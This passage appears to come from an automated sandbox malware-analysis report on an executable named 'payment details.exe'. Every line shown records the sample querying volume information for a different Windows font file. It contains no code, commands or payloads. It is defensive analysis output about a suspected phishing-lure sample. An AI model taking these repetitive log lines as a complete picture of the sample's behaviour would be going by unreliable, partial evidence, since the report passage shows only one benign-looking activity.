                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
